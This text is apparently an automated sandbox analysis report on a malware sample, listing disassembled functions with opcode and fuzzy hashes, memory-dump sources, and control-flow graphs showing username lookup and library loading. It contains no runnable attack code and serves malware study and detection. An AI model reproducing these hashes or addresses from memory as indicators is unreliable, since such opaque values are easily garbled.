                                                                                                                                              • Instruction ID: 66381e06b8132ae812877c27b6ee3c93f742f75adb4dc38cb9d280dfd614e2fc
                                                                                                                                              • Opcode Fuzzy Hash: f5c15fb32aac426a463b7338eac0a83699b2b84db03fa92bfc24e839d8bcbdd3
                                                                                                                                              • Instruction Fuzzy Hash: 1BE0207170E5456FEB52E278E4414ECBBB0FF0A110B1008BBC449C7191DE19F4118741
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              Function 00007FFBAD40A71C Relevance: .0, Instructions: 25COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000011.00000002.561298167.00007FFBAD400000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBAD400000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_17_2_7ffbad400000_InstallUtil.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: e0d396b394c57c32168ba5b8084de64d0dfd69199f80bebc56d85cd3b2a2b2ac
                                                                                                                                              • Instruction ID: b31f55266bee509a1ca6e85ae9cdd3acedc4348d0287f23ffa98a74e065d8054
                                                                                                                                              • Opcode Fuzzy Hash: e0d396b394c57c32168ba5b8084de64d0dfd69199f80bebc56d85cd3b2a2b2ac
                                                                                                                                              • Instruction Fuzzy Hash: 1FE04FA141F7C11EE34A5728882A698BFE0FB56304F8809BDE5898B1D3D9AD5549C743
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              Function 00007FFBAD40907A Relevance: .0, Instructions: 23COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000011.00000002.561298167.00007FFBAD400000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBAD400000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_17_2_7ffbad400000_InstallUtil.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: 16fbcd13d44208d5e336d632efb90a5250c23b8537a77bcb20d8df3d05f7da30
                                                                                                                                              • Instruction ID: 8885b26e218f90adb621a362dce979eba4533e7cdbc65f54a1406c9cf7fb75ff
                                                                                                                                              • Opcode Fuzzy Hash: 16fbcd13d44208d5e336d632efb90a5250c23b8537a77bcb20d8df3d05f7da30
                                                                                                                                              • Instruction Fuzzy Hash: 29E0EC51F4B50A1BAA46B578A4411EEA293CFC9110B544D36D90DC768BFC6D9C820780
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              Function 00007FFBAD4029A2 Relevance: .0, Instructions: 22COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000011.00000002.561298167.00007FFBAD400000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBAD400000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_17_2_7ffbad400000_InstallUtil.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: a0145d9ad2a4c6c719a23e10c76e5a807c8c41bb7a15c60d8460df58a574ced1
                                                                                                                                              • Instruction ID: 2bccdb8758faa65b6ff11d645c3cfb8706066f526c5fa1432332344f689764db
                                                                                                                                              • Opcode Fuzzy Hash: a0145d9ad2a4c6c719a23e10c76e5a807c8c41bb7a15c60d8460df58a574ced1
                                                                                                                                              • Instruction Fuzzy Hash: CAE02B9092D5D61FC3668B74487116CBF30BF02210B480EEDE099872C3EA680101D746
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              Function 00007FFBAD40C30E Relevance: .0, Instructions: 20COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000011.00000002.561298167.00007FFBAD400000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBAD400000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_17_2_7ffbad400000_InstallUtil.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: 11b9eea908389697c8b738c4fb525d9e2f9e7774a6935220ab1bcdbb4d6d2412
                                                                                                                                              • Instruction ID: 4f21481db9c9b197e6b64134eaa15f3482d5cabc05171ed429db2efcba2f76b0
                                                                                                                                              • Opcode Fuzzy Hash: 11b9eea908389697c8b738c4fb525d9e2f9e7774a6935220ab1bcdbb4d6d2412
                                                                                                                                              • Instruction Fuzzy Hash: 04E0E570E0911ADBEB55AAA0C854AAE72A1FB59310F080E3AC416D2690EEB8A5118680
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              Function 00007FFBAD408BBD Relevance: .0, Instructions: 19COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000011.00000002.561298167.00007FFBAD400000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBAD400000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_17_2_7ffbad400000_InstallUtil.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: d0798b9e44f880ab2f51fb641e7a801ca23319d0b4b9bf51253bdef3a4da0518
                                                                                                                                              • Instruction ID: 132f01f02adc6f827a204ce56c5aa832739ab50c8387185955529d7166934da4
                                                                                                                                              • Opcode Fuzzy Hash: d0798b9e44f880ab2f51fb641e7a801ca23319d0b4b9bf51253bdef3a4da0518
                                                                                                                                              • Instruction Fuzzy Hash: 03D06750F4A5165BA946B23490561BE11E3CF8D210B955C74E80DDB3DBFD6CED424381
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              Function 00007FFBAD400C78 Relevance: .0, Instructions: 18COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000011.00000002.561298167.00007FFBAD400000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBAD400000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_17_2_7ffbad400000_InstallUtil.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: 9a904a8109b830fd3623ef65b73841428dc64440e120ef6d115aedb9bbd0c982
                                                                                                                                              • Instruction ID: 6401008d408ac24e2f48149f459b1acb5aaea6af2e9819ff5632a2314ba98352
                                                                                                                                              • Opcode Fuzzy Hash: 9a904a8109b830fd3623ef65b73841428dc64440e120ef6d115aedb9bbd0c982
                                                                                                                                              • Instruction Fuzzy Hash: 41D012704396845AD748AB348845665BAD0FB88308FC0193CFC4DC2191EA6D92448642
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              Function 00007FFBAD40601F Relevance: .0, Instructions: 18COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000011.00000002.561298167.00007FFBAD400000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBAD400000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_17_2_7ffbad400000_InstallUtil.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: b3b8e656175d27f31cd996727700b344558926f277f37bff8a134033c948c2df
                                                                                                                                              • Instruction ID: 5f7a956b03a7f308164aa4de4732bc84d4c6e49cd07a6f5e2304fb8e56505136
                                                                                                                                              • Opcode Fuzzy Hash: b3b8e656175d27f31cd996727700b344558926f277f37bff8a134033c948c2df
                                                                                                                                              • Instruction Fuzzy Hash: BBD0178160EA966FF543A37844610FA2B91DF8A211BA408BAD4AB878C3FC0C24069261
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              Function 00007FFBAD407CB0 Relevance: .0, Instructions: 15COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000011.00000002.561298167.00007FFBAD400000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBAD400000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_17_2_7ffbad400000_InstallUtil.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: d0762eebed72469278873833948b063a8c08f2b006f32fd8770cdfc9586d0d1d
                                                                                                                                              • Instruction ID: c97c3e39e312b26e86769111d25865f7544b3cc9ff780cd4977c7fdcdec044d2
                                                                                                                                              • Opcode Fuzzy Hash: d0762eebed72469278873833948b063a8c08f2b006f32fd8770cdfc9586d0d1d
                                                                                                                                              • Instruction Fuzzy Hash: 9AC01280D3F40732FA2A3236898A2B81680EB0C302FC40871EC0DC2281FC4E21D91993
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              Function 00007FFBAD406BA5 Relevance: .0, Instructions: 12COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000011.00000002.561298167.00007FFBAD400000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBAD400000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_17_2_7ffbad400000_InstallUtil.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: b4e6f0ef8c4f3ba79d6b8c0e21a6c833049a45268e8b4843604480f8fd2c306d
                                                                                                                                              • Instruction ID: dc25ea1327da5a679092a6591d22e222e513b4c41c4633a51050d3d0b320034a
                                                                                                                                              • Opcode Fuzzy Hash: b4e6f0ef8c4f3ba79d6b8c0e21a6c833049a45268e8b4843604480f8fd2c306d
                                                                                                                                              • Instruction Fuzzy Hash: A7C0128120ED96AFE143A27848620FE2B40EE4A2007A008BAD0DB47882AE0820039382
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              Function 00007FFBAD408044 Relevance: .0, Instructions: 11COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000011.00000002.561298167.00007FFBAD400000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBAD400000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_17_2_7ffbad400000_InstallUtil.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: 5098caa48816db213ca816130eb9988e574274f4e3351343e496c39385f18224
                                                                                                                                              • Instruction ID: 368ba852da4b2618e3f6d4aef171ea3491247765a36bc527aa1c8363627d8ba1
                                                                                                                                              • Opcode Fuzzy Hash: 5098caa48816db213ca816130eb9988e574274f4e3351343e496c39385f18224
                                                                                                                                              • Instruction Fuzzy Hash: 47D0C9A0D1A507AEEB52AA74C4416BD62B1DF4C301F904835D80EE6286FE2C64015B91
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              Function 00007FFBAD406A60 Relevance: .0, Instructions: 9COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000011.00000002.561298167.00007FFBAD400000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBAD400000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_17_2_7ffbad400000_InstallUtil.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: 87ccb21dbd610e1f0517b7717f291b71275b2a6cadacc24b1f19531d5e5aa8a6
                                                                                                                                              • Instruction ID: e4450f473d8c01e9992d469947b243a6a75ff9bf0d694979d94d765fa7bb43ed
                                                                                                                                              • Opcode Fuzzy Hash: 87ccb21dbd610e1f0517b7717f291b71275b2a6cadacc24b1f19531d5e5aa8a6
                                                                                                                                              • Instruction Fuzzy Hash: BED0CAB0C1510AAAE786CBB1C0819AEB7B0EF0D304B6088B9C85AAA250DA39A500CE00
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              Function 00007FFBAD402A1B Relevance: .0, Instructions: 9COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000011.00000002.561298167.00007FFBAD400000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBAD400000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_17_2_7ffbad400000_InstallUtil.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: 90013257daf3105183b915a004c983a95349d7a6a5981dc592851c929a757673
                                                                                                                                              • Instruction ID: 95e940786b605b078fcda4cae90c6179c3866c239dae0ae7d6b5ff89b3bd527a
                                                                                                                                              • Opcode Fuzzy Hash: 90013257daf3105183b915a004c983a95349d7a6a5981dc592851c929a757673
                                                                                                                                              • Instruction Fuzzy Hash: A4C00274D1561DAFDB51DB54C8816AD77B1FF4C340F500564D449D3255DE3469418B41
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              Function 00007FFBAD405FA3 Relevance: .0, Instructions: 9COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000011.00000002.561298167.00007FFBAD400000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBAD400000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_17_2_7ffbad400000_InstallUtil.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: 4711b095f89faaf6d38823524e6af709f8ed777122361c99f0a9490a42d49ec4
                                                                                                                                              • Instruction ID: 7ed5c1a311b68c0d1b093a4f5b81c7bf594cfbfe1f68cff42693ad5b56c59583
                                                                                                                                              • Opcode Fuzzy Hash: 4711b095f89faaf6d38823524e6af709f8ed777122361c99f0a9490a42d49ec4
                                                                                                                                              • Instruction Fuzzy Hash: E0C012B0A0A10AAFE366EB30C00026832A2EF89300F2088B8841B82190EE3D29419A00
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              Function 00007FFBAD407910 Relevance: .0, Instructions: 8COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000011.00000002.561298167.00007FFBAD400000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBAD400000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_17_2_7ffbad400000_InstallUtil.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: cd8eae6fe19e1383ebb59e25a14c130b3297ef3d4b5d3e1e08851ae7cc762ba7
                                                                                                                                              • Instruction ID: 7da68901fd1081e3267ac2f2cb498955269ac10e5ab993ee4b0ce1bd7835b3ec
                                                                                                                                              • Opcode Fuzzy Hash: cd8eae6fe19e1383ebb59e25a14c130b3297ef3d4b5d3e1e08851ae7cc762ba7
                                                                                                                                              • Instruction Fuzzy Hash: B8A01108C8380A02A80830320C822A030A2AB88000FC8A820EC088008AECAE02AA0282
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              Execution Graph

                                                                                                                                              Execution Coverage:17.4%
                                                                                                                                              Dynamic/Decrypted Code Coverage:100%
                                                                                                                                              Signature Coverage:0%
                                                                                                                                              Total number of Nodes:9
                                                                                                                                              Total number of Limit Nodes:0
                                                                                                                                              execution_graph 10701 21a5ad0 10702 21a5aee 10701->10702 10705 21a5a64 10702->10705 10704 21a5b25 10707 21a75f0 LoadLibraryA 10705->10707 10708 21a76e9 10707->10708 10709 21af6e0 10712 21af741 GetUserNameW 10709->10712 10711 21af82d 10712->10711

                                                                                                                                              Executed Functions

                                                                                                                                              Function 021AF6D4 Relevance: 1.6, APIs: 1, Instructions: 133COMMON
                                                                                                                                              Download Yara Rule

                                                                                                                                              Control-flow Graph

                                                                                                                                              • Executed
                                                                                                                                              • Not Executed
                                                                                                                                              control_flow_graph 259 21af6d4-21af73f 260 21af7aa-21af7ae 259->260 261 21af741-21af76c 259->261 262 21af7d9-21af7e4 260->262 263 21af7b0-21af7d3 260->263 270 21af76e-21af770 261->270 271 21af79c 261->271 264 21af7f0-21af82b GetUserNameW 262->264 265 21af7e6-21af7ee 262->265 263->262 268 21af82d-21af833 264->268 269 21af834-21af84a 264->269 265->264 268->269 272 21af84c-21af858 269->272 273 21af860-21af887 269->273 275 21af792-21af79a 270->275 276 21af772-21af77c 270->276 274 21af7a1-21af7a4 271->274 272->273 284 21af889-21af88d 273->284 285 21af897 273->285 274->260 275->274 280 21af77e 276->280 281 21af780-21af78e 276->281 280->281 281->281 282 21af790 281->282 282->275 284->285 286 21af88f 284->286 287 21af898 285->287 286->285 287->287
                                                                                                                                              APIs
                                                                                                                                              • GetUserNameW.ADVAPI32(00000000,00000000), ref: 021AF81B
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000013.00000002.554762812.00000000021A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 021A0000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_19_2_21a0000_KbWSe.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: NameUser
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 2645101109-0
                                                                                                                                              • Opcode ID: 08e97231d3f73d244bcafdaaa1cc54e145c4e2ed585cebda04b53b2dd0dd2fec
                                                                                                                                              • Instruction ID: 3b93b28babc6e34a2ea3d8a73674669a1d7adef70cbebf2c15be9ec9bd4e198a
                                                                                                                                              • Opcode Fuzzy Hash: 08e97231d3f73d244bcafdaaa1cc54e145c4e2ed585cebda04b53b2dd0dd2fec
                                                                                                                                              • Instruction Fuzzy Hash: 34514679E002188FDB18CFA9C89479DFBB1BF48314F248129D819BB794D7759846CF94
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              Function 021AF6E0 Relevance: 1.6, APIs: 1, Instructions: 132COMMON
                                                                                                                                              Download Yara Rule

                                                                                                                                              Control-flow Graph

                                                                                                                                              • Executed
                                                                                                                                              • Not Executed
                                                                                                                                              control_flow_graph 288 21af6e0-21af73f 289 21af7aa-21af7ae 288->289 290 21af741-21af76c 288->290 291 21af7d9-21af7e4 289->291 292 21af7b0-21af7d3 289->292 299 21af76e-21af770 290->299 300 21af79c 290->300 293 21af7f0-21af82b GetUserNameW 291->293 294 21af7e6-21af7ee 291->294 292->291 297 21af82d-21af833 293->297 298 21af834-21af84a 293->298 294->293 297->298 301 21af84c-21af858 298->301 302 21af860-21af887 298->302 304 21af792-21af79a 299->304 305 21af772-21af77c 299->305 303 21af7a1-21af7a4 300->303 301->302 313 21af889-21af88d 302->313 314 21af897 302->314 303->289 304->303 309 21af77e 305->309 310 21af780-21af78e 305->310 309->310 310->310 311 21af790 310->311 311->304 313->314 315 21af88f 313->315 316 21af898 314->316 315->314 316->316
                                                                                                                                              APIs
                                                                                                                                              • GetUserNameW.ADVAPI32(00000000,00000000), ref: 021AF81B
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000013.00000002.554762812.00000000021A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 021A0000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_19_2_21a0000_KbWSe.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: NameUser
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 2645101109-0
                                                                                                                                              • Opcode ID: e5bddb639cc59251b4f4e35dc44ab3db03a8663b41955b3fd39529654db3ea3d
                                                                                                                                              • Instruction ID: b7560a3694981bc24ddaeb60e3f4f2aa4db58d3ad3963bad13e55b12082eac6f
                                                                                                                                              • Opcode Fuzzy Hash: e5bddb639cc59251b4f4e35dc44ab3db03a8663b41955b3fd39529654db3ea3d
                                                                                                                                              • Instruction Fuzzy Hash: A0513678E002188FDB18CFA9C898B9EFBB5BF48314F248129E819BB754D7759845CF94
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              Function 021A75E5 Relevance: 1.6, APIs: 1, Instructions: 98libraryCOMMON
                                                                                                                                              Download Yara Rule

                                                                                                                                              Control-flow Graph

                                                                                                                                              • Executed
                                                                                                                                              • Not Executed
                                                                                                                                              control_flow_graph 317 21a75e5-21a7647 318 21a769b-21a76e7 LoadLibraryA 317->318 319 21a7649-21a766e 317->319 322 21a76e9-21a76ef 318->322 323 21a76f0-21a7721 318->323 319->318 324 21a7670-21a7672 319->324 322->323 329 21a7723-21a7727 323->329 330 21a7731 323->330 326 21a7674-21a767e 324->326 327 21a7695-21a7698 324->327 331 21a7682-21a7691 326->331 332 21a7680 326->332 327->318 329->330 333 21a7729 329->333 335 21a7732 330->335 331->331 334 21a7693 331->334 332->331 333->330 334->327 335->335
                                                                                                                                              APIs
                                                                                                                                              • LoadLibraryA.KERNELBASE(?), ref: 021A76D7
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000013.00000002.554762812.00000000021A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 021A0000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_19_2_21a0000_KbWSe.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: LibraryLoad
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 1029625771-0
                                                                                                                                              • Opcode ID: 4d6089dffe63487f775700b509c8baae2a42ae0010319d377622ed2c32933347
                                                                                                                                              • Instruction ID: 8a81708897f7becce4dee26a31d98463c7539aae431e47349370bcb889c23c74
                                                                                                                                              • Opcode Fuzzy Hash: 4d6089dffe63487f775700b509c8baae2a42ae0010319d377622ed2c32933347
                                                                                                                                              • Instruction Fuzzy Hash: 204156B5E002188FEB10CFADC99578EFBF2EB48304F108429E819AB380D7749946CF95
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              Function 021A5A64 Relevance: 1.6, APIs: 1, Instructions: 97libraryCOMMON
                                                                                                                                              Download Yara Rule

                                                                                                                                              Control-flow Graph

                                                                                                                                              • Executed
                                                                                                                                              • Not Executed
                                                                                                                                              control_flow_graph 336 21a5a64-21a7647 338 21a769b-21a76e7 LoadLibraryA 336->338 339 21a7649-21a766e 336->339 342 21a76e9-21a76ef 338->342 343 21a76f0-21a7721 338->343 339->338 344 21a7670-21a7672 339->344 342->343 349 21a7723-21a7727 343->349 350 21a7731 343->350 346 21a7674-21a767e 344->346 347 21a7695-21a7698 344->347 351 21a7682-21a7691 346->351 352 21a7680 346->352 347->338 349->350 353 21a7729 349->353 355 21a7732 350->355 351->351 354 21a7693 351->354 352->351 353->350 354->347 355->355
                                                                                                                                              APIs
                                                                                                                                              • LoadLibraryA.KERNELBASE(?), ref: 021A76D7
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000013.00000002.554762812.00000000021A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 021A0000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_19_2_21a0000_KbWSe.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: LibraryLoad
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 1029625771-0
                                                                                                                                              • Opcode ID: ff4fe997657d818e40ebf8b5faae9947a3ca8193956c7e1664808256348d18de
                                                                                                                                              • Instruction ID: ee3174bdb75c7365eba895fe2da987a2a2930bbe907fc4ef7fa4473bef6ad18a
                                                                                                                                              • Opcode Fuzzy Hash: ff4fe997657d818e40ebf8b5faae9947a3ca8193956c7e1664808256348d18de
                                                                                                                                              • Instruction Fuzzy Hash: 1C4156B4E006198FDB10CFADC99579EFBF2AB48304F148029E819AB380D7749942CF95
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              Function 0064D4D8 Relevance: .1, Instructions: 75COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000013.00000002.546842072.000000000064D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0064D000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_19_2_64d000_KbWSe.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: c114bbad959a03eb73ce327434bb7b7f4362596738e3341387e4dc045d48a977
                                                                                                                                              • Instruction ID: 6efde368818540d9b65d2f41ad20b045991b1fd59f302e6733cd32e8ea7ccf10
                                                                                                                                              • Opcode Fuzzy Hash: c114bbad959a03eb73ce327434bb7b7f4362596738e3341387e4dc045d48a977
                                                                                                                                              • Instruction Fuzzy Hash: F5213A75900244DFDB09CF18D9C0B57BF66FB98328F24856DE8054B356C736D856CBA2
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              Function 0065D030 Relevance: .1, Instructions: 72COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000013.00000002.547115018.000000000065D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0065D000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_19_2_65d000_KbWSe.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: 6f1c3c509dee23d6c20d9f31864f3327f7058d383a668e62cc9382c5db2ae26e
                                                                                                                                              • Instruction ID: 31a657c65cc35124b385d1444e461c0cb15843dfd898a6122ee6a66217821d38
                                                                                                                                              • Opcode Fuzzy Hash: 6f1c3c509dee23d6c20d9f31864f3327f7058d383a668e62cc9382c5db2ae26e
                                                                                                                                              • Instruction Fuzzy Hash: 5E21D375504244DFDB25DF18D9C0B26BB66EB84315F24C569DC494B3C6C33AD84BCA62
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              Function 0064D4D3 Relevance: .1, Instructions: 56COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000013.00000002.546842072.000000000064D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0064D000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_19_2_64d000_KbWSe.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: 4e78fb41457c0dbc2d9524af8796639b843feda46be7989836c0fd150c2e2370
                                                                                                                                              • Instruction ID: e0e468c5930efa49c09960ed06328f62905415033fa6865cd0b81d7a80839657
                                                                                                                                              • Opcode Fuzzy Hash: 4e78fb41457c0dbc2d9524af8796639b843feda46be7989836c0fd150c2e2370
                                                                                                                                              • Instruction Fuzzy Hash: D0110376804280CFCB06CF04D9C0B56BF72FB84324F28C6A9D8050B356C33AD856CBA2
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              Function 0065D02B Relevance: .1, Instructions: 53COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000013.00000002.547115018.000000000065D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0065D000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_19_2_65d000_KbWSe.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: 4a40b480d4fa50119ebda35aff352db3dffa7348ebbf36f966237d5faf07d1e9
